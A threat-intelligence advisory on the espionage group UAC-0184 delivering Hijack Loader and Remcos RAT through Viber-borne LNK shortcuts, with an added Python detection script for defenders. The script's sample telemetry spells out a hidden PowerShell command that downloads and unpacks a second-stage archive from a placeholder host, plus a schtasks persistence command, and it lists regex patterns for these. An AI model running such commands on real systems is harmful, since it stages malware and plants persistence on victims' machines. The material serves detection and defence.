State-Aligned Espionage Group Expands Messaging-App Malware Delivery Tactics
Threat actors shift from email to messaging platforms to improve stealth and success rates

Severity
HIGH — Targeted Espionage / Malware Delivery
Technical Overview
Threat intelligence researchers have identified continued espionage activity by the Russia-aligned threat group UAC-0184, also tracked as Hive0156. The group actively targets military and government environments using evolving delivery techniques.
While earlier campaigns relied heavily on phishing emails, recent operations show a deliberate shift toward messaging platforms, with Viber now serving as a primary delivery channel. This evolution allows attackers to bypass traditional email security controls and exploit user trust in real-time communication tools.
The group has remained highly active and focused on intelligence collection rather than rapid disruption.
Evolution of Attack Tactics
UAC-0184 first came to public attention in early 2024 after multiple campaigns against government-related entities. Historically, the group favored war-themed email lures to distribute Hijack Loader, which then deployed Remcos RAT as the final payload.
Over time, researchers observed a gradual transition away from email. The attackers began abusing Signal and Telegram, and the latest activity confirms Viber as an additional delivery vector. This shift demonstrates a clear attempt to increase reach and reduce detection.
Attack Chain and Malware Delivery
The attack begins with a message sent through Viber that contains a malicious ZIP archive. The archive includes multiple Windows shortcut (LNK) files disguised as legitimate Microsoft Word or Excel documents.
When a victim opens one of the shortcuts, two actions occur simultaneously. First, the file displays a decoy document to reduce suspicion. Second, it silently launches a PowerShell-based routine that downloads a secondary archive from attacker-controlled infrastructure.
This secondary archive contains components required to assemble Hijack Loader, which executes directly in memory to avoid leaving artifacts on disk.
Loader Behavior and Evasion Techniques
Hijack Loader uses a multi-stage execution process designed to evade endpoint detection. It leverages advanced techniques such as DLL side-loading and module stomping to remain hidden.
Before deploying the final payload, the loader surveys the infected system. It checks for installed security products by computing CRC32 hashes and matching them against values that correspond to well-known security vendors, including endpoint protection and antivirus software.
The loader also establishes persistence using scheduled tasks and applies obfuscation techniques to bypass static detection mechanisms.
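The shortcut-launched PowerShell download stage and the scheduled-task persistence described above both leave a process-creation trail that a SOC can score. The following is an added detection example written for this advisory, not code from the researchers or the malware; field names loosely mirror Sysmon Event ID 1, and all sample events, paths and the .invalid hostname are constructed.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    parent_image: str   # launching process, e.g. C:\Windows\explorer.exe
    image: str          # process that was created
    command_line: str

# Hidden / policy-bypassing PowerShell switches typical of a shortcut-launched stage
HIDDEN_FLAGS = re.compile(r"-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?|-e(?:xecutionpolicy|p)\s+bypass", re.I)
# Cmdlets and .NET calls that fetch the second-stage archive
DOWNLOAD_API = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|start-bitstransfer|net\.webclient", re.I)
ARCHIVE_EXPAND = re.compile(r"expand-archive|\.zip\b", re.I)
TASK_CREATE = re.compile(r"\bschtasks(?:\.exe)?\b.*\s/create\b", re.I)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return the names of the rules the event matches (empty list = nothing suspicious)."""
    hits = []
    img, parent, cl = basename(ev.image), basename(ev.parent_image), ev.command_line
    # Rule 1: explorer.exe is what runs a double-clicked LNK; it rarely spawns hidden PowerShell legitimately.
    if parent == "explorer.exe" and img == "powershell.exe" and HIDDEN_FLAGS.search(cl):
        hits.append("lnk_hidden_powershell")
    # Rule 2: PowerShell retrieving and unpacking an archive from the network (second-stage fetch).
    if img == "powershell.exe" and DOWNLOAD_API.search(cl) and ARCHIVE_EXPAND.search(cl):
        hits.append("powershell_archive_download")
    # Rule 3: scheduled-task persistence registered from a scripting host instead of an admin console.
    if img == "schtasks.exe" and parent in {"powershell.exe", "cmd.exe", "wscript.exe", "mshta.exe"} and TASK_CREATE.search(cl):
        hits.append("scripted_schtask_persistence")
    return hits

def triage(events):
    """Map the index of each suspicious event to its matched rules; several hits on one host merit escalation."""
    return {i: h for i, ev in enumerate(events) if (h := score_event(ev))}

# Constructed sample telemetry for this example (not real events from the campaign)
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -NoProfile -WindowStyle Hidden -Command "Invoke-WebRequest http://PLACEHOLDER.invalid/stage2.zip '
              r'-OutFile $env:TEMP\s.zip; Expand-Archive $env:TEMP\s.zip $env:TEMP\s"'),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /create /sc minute /mo 15 /tn "Updater" /tr "C:\Users\user\AppData\Local\Temp\s\run.exe"'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoExit -Command Get-Process"),   # benign: interactive console opened from a shortcut
    ProcEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
]

if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))
```

The rules are deliberately narrow; in production they should be combined with the recommended script-control and LNK-blocking policies rather than used as the only signal.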
Final Payload and Capabilities
After completing its checks, the loader injects Remcos RAT into a legitimate process. This technique allows the malware to blend into normal system activity.
Once active, Remcos provides attackers with full remote access to the compromised endpoint. Capabilities include command execution, file management, activity monitoring, and data exfiltration. The attackers can operate through a graphical control interface, enabling both automated and manual interaction with victim systems.
Key Risks
- Messaging platforms bypass traditional email defenses
- Decoy documents reduce user suspicion
- In-memory execution limits forensic visibility
- Remote administration tools enable long-term surveillance
Recommended Defensive Actions
- Treat messaging platforms as potential malware delivery channels
- Block execution of LNK files from untrusted archives
- Monitor PowerShell usage and abnormal process injection
- Enforce strict application and script controls
- Educate users about phishing risks beyond email